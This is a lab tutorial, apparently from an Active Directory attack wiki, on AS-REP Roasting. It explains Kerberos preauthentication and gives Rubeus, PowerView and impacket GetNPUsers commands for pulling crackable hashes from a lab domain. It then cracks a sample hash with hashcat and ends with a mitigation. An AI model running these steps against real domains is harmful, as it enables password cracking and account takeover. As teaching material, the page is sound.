AD101
Search…
AS-REP Roasting Attack

Definition

AS-REP Roasting is an attack against Kerberos for user accounts that do not require pre-authentication. preauthentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.

Theory & Background

During preauthentication, a user will enter their password which will be used to encrypt a timestamp, send that to domain controller and then the domain controller will attempt to decrypt it and validate request. From there, the TGT will be issued for the user to use for future authentication.
The AS-REP response has two parts one is the TGT ticket encrypted using the KRBTGT Account's NTLM hash and another one is the session key (enc-part in image 2) which is encrypted using user account's NTLM hash. If preauthentication isn’t enabled, an attacker can send an AS-REQ for any user that doesn’t have preauth required and receive a bit of encrypted material back that can be cracked offline to reveal the target user’s password. If you’re already an authenticated (but otherwise unprivileged) user, you can easily enumerate what users in the domain have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).
Luckily, preauthentication is required by default in Active Directory. However, this can be controlled by a user account control setting on every user account
[email protected] configured with 'Do not require Kerberos preauthentication'
Snapshot of wireshark
My Lab environment for this lab is:
    1.
    [email protected] - User with kerberos preauthentication disabled
    2.
    redwolf-dc - Domain Controller

Abuse

There are so many tools that can be used to perform AS-REP Roasting attack, however i will be demonstrating with Rubeus (for windows) and GetNPUsers.py (for linux) from impacket scripts.

Execution with Rubeus

Users that have Pre-Authentication disabled (This command requires powerview to be loaded on the memory)
1
Get-DomainUser -PreauthNotRequired
Copied!
Then we can use Rubeus.exe to dump the session key present in AS-REP
1
.\Rubeus.exe asreproast /nowrap
Copied!

Execution with GetNPUsers

Install the impacket scripts
1
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
2
sudo pip3 install -r /opt/impacket/requirements.txt
3
sudo python3 ./setup.py install
Copied!
Enumerate the list of users present in the domain and use it while executing GetNPUsers.py
1
GetNPUsers.py REDWOLF.LOCAL/[email protected] -dc-ip 192.168.62.2
Copied!

Cracking the AS-REP Hash

Say this is the hash we get for the potential victim:
1
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
Copied!
We need into insert 23 after $krb5asrep$
1
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
Copied!
Then we can use john or hashcat tool to crack the hash
1
hashcat -m 18200 '[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213' ~/Wordlist/rockyou.txt
Copied!

Mitigation

Uncheck 'Do not require Kerberos preauthentication' in the Account Options of the user account

References

Last modified 5mo ago